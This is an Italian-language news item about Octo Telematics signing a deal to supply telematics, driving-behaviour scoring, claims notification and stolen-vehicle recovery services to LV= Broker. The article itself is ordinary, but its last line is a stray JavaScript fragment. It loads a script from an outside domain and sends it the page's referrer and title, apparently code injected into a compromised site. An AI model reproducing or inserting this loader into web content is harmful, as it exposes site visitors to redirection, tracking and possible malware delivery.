Octo Telematics ha firmato un accordo per fornire i propri servizi telematici e di analisi dati a LV = Broker, la divisione broker della terza compagnia assicurativa britannica.

Octo fornirà a LV = Broker una gamma completa di servizi telematici per consentire all’assicuratore una valutazione di rischio più accurata ed una semplificazione nella gestione dei sinistri, come pure di premiare i consumatori che sono più attenti alla sicurezza. L’esperienza di Octo ha aiutato gli assicuratori ad ottenere miglioramenti a due cifre nel Combined Ratio pur continuando ad offrire le migliori di prezzo per gli automobilisti.

In base all’accordo, LV = Broker beneficerà delle capacità analitiche di Octo che fornirà un ecosistema telematico completo compresi i sensori, Punteggio del Comportamento di Guida, Piattaforma per la Prima Notifica di Sinistro (FNOL) e Recupero Veicolo Rubato (SVR).

Come parte dell’offerta per i clienti, l’applicazione mobile di guida di LV = Broker fornirà gli automobilisti le statistiche di utilizzo e un elenco dei viaggi. Ciò contribuirà a educare gli automobilisti e migliorare il loro comportamento di guida attraverso ricompense. Octo utilizzerà il proprio know-how nel campo della telematica su dispositivo mobile, acquisito nel processo di digitalizzazione del settore assicurativo, a supporto dell’applicazione.

I dati di Octo supporteranno la LV = Broker Portal, consentendo agli intermediari di ottenere l’accesso immediato a una serie di servizi che semplificano il business con LV =. Octo fornirà la piattaforma telematica e di analisi per supportare il canale broker.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;